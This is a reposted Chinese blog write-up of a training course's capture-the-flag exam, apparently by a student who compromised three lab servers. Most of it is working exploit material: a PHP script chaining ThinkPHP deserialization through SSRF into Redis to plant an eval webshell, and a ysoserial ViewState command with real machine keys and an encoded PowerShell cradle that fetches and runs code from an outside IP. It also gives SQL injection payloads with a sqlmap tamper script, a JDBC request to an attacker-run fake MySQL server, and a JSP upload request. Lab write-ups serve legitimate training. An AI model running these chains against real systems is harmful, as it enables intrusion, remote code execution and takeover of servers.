2024年3月8日09:12:13评论34 views字数 10378阅读34分35秒阅读模式

免责声明：本公众号所提供的文字和信息仅供学习和研究使用，不得用于任何非法用途。我们强烈谴责任何非法活动，并严格遵守法律法规。读者应该自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。

起因

这一年暗月更新了很多教程例如java代码审计、net代码审计、php代码审计等。

年底了该来一次大的考核了测试的目的是通过考核测试同学们学习的效果，在考核过程中发现自己的不足，往后应该更有针对性学习。

本次考核的内容

本次考核采用在线靶场三台服务器共四个FLAG 拿下即可通过。

本次考核的重点多个漏洞配合外网打点，考验大家的挖洞漏洞和利用漏洞的能力。

主要的内容包括 java代码审计、net代码审计、php代码审计考核大家对WEB安全的掌握程度，也有linux和windows提权等

本次考核全程黑盒模式发现漏洞利用漏洞打通所有关卡。

通过率

本次参与考核的人数是100人通过8人通过率 8% 符合预期

以下是某个同学通过考核的WP

thinkphp

暗月渗透测试年终考核通关过程

参考:https://xz.aliyun.com/t/7594

redis缓存

以think_serialize: 开头的value通过get获取会触发反序列化

暗月渗透测试年终考核通关过程

脚本编写过程
先将生成的反序列化payload取反(取反是为了防止在传输过程中发生报错),由于get请求的长度限制遂将他分段传输，利用redis的APPEND命令不断的追加，待追加完成之后用bitop:not再次取反即可得到完整的反序列化数据暗月渗透测试年终考核通关过程

一键利用脚本如下
反序列化poc 用 phpggc即可生成

<?php

// eval 1 > payload123123.php
$a= "think_serialize:";
$a = $a."O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A5%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A9%3A%22%00%2A%00parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7D%7D";

$originalString = urldecode($a);
$reversedString = '';

for ($i = 0; $i < strlen($originalString); $i++) {
$reversedString .= $originalString[$i] ^ "xFF";
}
$length = ceil(strlen($reversedString) / 10);

$segments = str_split($reversedString, $length);
$tmp_key = bin2hex(random_bytes(8));
$redis_ip = "127.0.0.1";
$server_ip = "103.164.63.172:8081";

$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/config:set:slave-read-only:no";
echo file_get_contents($url);
foreach ($segments as $value)
{
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/APPEND:$tmp_key:".$value;
echo file_get_contents($url);
}
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/bitop:not:payload12xx123:$tmp_key";
echo file_get_contents($url);

echo file_get_contents("http://$server_ip/public/index.php?s=index/Index/getname&name=payload12xx123");

echo "webshell:npass:1nhttp://$server_ip/public/payload123123.php";

?>

暗月渗透测试年终考核通关过程

在根目录下即可找到flag 暗月渗透测试年终考核通关过程

会议预定系统

http://103.164.63.231/login.aspx 会议预定系统

暗月渗透测试年终考核通关过程

前台viewstate反序列化

参考:
https://blog.csdn.net/qq_41891666/article/details/107290131
https://www.websecuritys.cn/index.php/archives/94/

能够在login.aspx出观察到他的隐藏域暗月渗透测试年终考核通关过程

如下暗月渗透测试年终考核通关过程

网上熟悉了下打法之后，发现直接用ysoserial.net就能进行攻击
运行 ./ysoserial.exe -p ViewState也会给你常用的用法暗月渗透测试年终考核通关过程

在结合网上下载的源码的web.config，从中获取decryptionkey和validationkey 即可完成整个payload构造

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwA1AC4AMQA3ADgALgA3ADMALgAxADQAMQA6ADgAMAAxADEALwBhADEAMQAxACcAKQApACIA" --path="/login.aspx" --apppath="/" -decryptionkey="215D97F766DE50E575496E01C16306C751376E2EBBDE4B51" -validationkey="0BF11533BC55065E2C46C2F295FC5A501A13B28FE43B6F56E57973D4BE818354D21B7102EC24DB26B803D65936A5F1D812158D8F729406C168FC8440B4CDE16B"   --islegacy

暗月渗透测试年终考核通关过程

随后便能直接上线，
然后在土豆提权，在administrator下即可获取到flag 暗月渗透测试年终考核通关过程

前台注入点1

暗月渗透测试年终考核通关过程

这个点就是传进来的dt未进行任何过滤我们构造') 进行闭合即可触发sqli
利用

http://103.164.63.231/report/data_list.aspx?dt=2024-01-27%27);waitfor delay '0:0:5'--

可以直接堆叠

前台注入点2

暗月渗透测试年终考核通关过程

这个点从cookie中获取了值,先进行了一个Helper.SimpleDecryptStr 简单的解密暗月渗透测试年终考核通关过程

能够发现，这就是个简单的字符串变换
我们可以编写tamper脚本很轻松的实现注入
脚本如下

from lib.core.enums import PRIORITY  
from lib.core.common import singleTimeWarnMessage  
from urllib.parse import quote

__priority__ = PRIORITY.LOWEST

def dependencies():
singleTimeWarnMessage("此脚本仅适用于 book_meeting")

def simple_encrypt_str(rs):
by = [ord(char) + 1 for char in rs]
encrypted_str = ''.join(chr(byte) for byte in reversed(by))
return encrypted_str

def tamper(payload, **kwargs):
return quote(simple_encrypt_str(payload))

sqlmap -u "http://103.164.63.231/wx/AutoLogin_Qywx.aspx" --level 3 --cookie="qywxusername=1" -p qywxusername --tamper=book_meeting_AutoLogin_Qywx.py -
-ignore-redirects --skip-urlencode

暗月渗透测试年终考核通关过程

前台注入点3

暗月渗透测试年终考核通关过程

这个位置和之前的一致，都是对传入的值进行了简单的加密，利用方式与上面的一直
位置位于

/dd/AutoLogin.aspx

站库分离

因为存在堆叠注入,可以直接使用 xp_cmdshell 执行系统命令,通过 sqlmap --os--shell可以一键利用
然后在上线cs,最后可以在users下面即可获取到flag 暗月渗透测试年终考核通关过程

CBoard

http://103.164.63.172:8090
admin root123默认口令进后台暗月渗透测试年终考核通关过程

jdbc 反弹shell

暗月渗透测试年终考核通关过程

从GitHub上获取的源码，其中pom.xml如下我们得知了数据库的版本，并且很有可能可以打CC6 用项目：https://github.com/fnmsd/MySQL_Fake_Server 构建evil server
暗月渗透测试年终考核通关过程

最后http raw如下

POST /dashboard/test.do HTTP/1.1
Host: 103.164.63.172:8090
Content-Length: 403
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://39.101.184.7:8026
Referer: http://39.101.184.7:8026/cboard/starter.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=351888835121736C4B575BE0B49F2DDA
Connection: close

datasource=%7B%22config%22%3A%7B%22pooled%22%3Atrue%2C%22driver%22%3A%22com.mysql.jdbc.Driver%22%2C%22jdbcurl%22%3A%22jdbc%3Amysql%3A%2F%2F175.178.73.141%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26user%3Dbase64ZGVzZXJfQ0MzMV9pZA%3D%3D%22%2C%22username%22%3A%22CommonsCollections6%22%2C%22password%22%3A%22123456%22%7D%2C%22type%22%3A%22jdbc%22%2C%22name%22%3A%22test%22%7D&query=%7B%22sql%22%3A%221%22%7D

暗月渗透测试年终考核通关过程

后台任意文件上传

还有一处能够进行任意文件上传暗月渗透测试年终考核通关过程

可以从上面源码看到，整个上传过程就是简单的拼接，并未对文件的后缀进行任何的处理，目标环境中间件是Tomcat,这就导致了我们可以上传任意的jsp webshell，从而获取网站的权限暗月渗透测试年终考核通关过程

http raw如下

POST /dashboard/uploadImage.do HTTP/1.1
Host: 103.164.63.172:8090
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=FBC699B01EC74F0154B6ECF2EF00953B
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Length: 181

------WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: image/png

1
------WebKitFormBoundaryY32jx5xlw76vxXzj--

最后可以从源码中获取完整的拼接路径

http://103.164.63.172:8090/imgs/cockpit/upload/20240128104846/2.jsp

暗月渗透测试年终考核通关过程

原文始发于微信公众号（实战安全研究）：暗月渗透测试年终考核通关过程

左青龙
微信扫一扫

右白虎
微信扫一扫

暗月渗透测试年终考核通关过程

起因

本次考核的内容

通过率

thinkphp

redis缓存

会议预定系统

前台viewstate反序列化

前台注入点1

前台注入点2

前台注入点3

站库分离

CBoard

jdbc 反弹shell

后台任意文件上传

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

发表评论

在线咨询

微信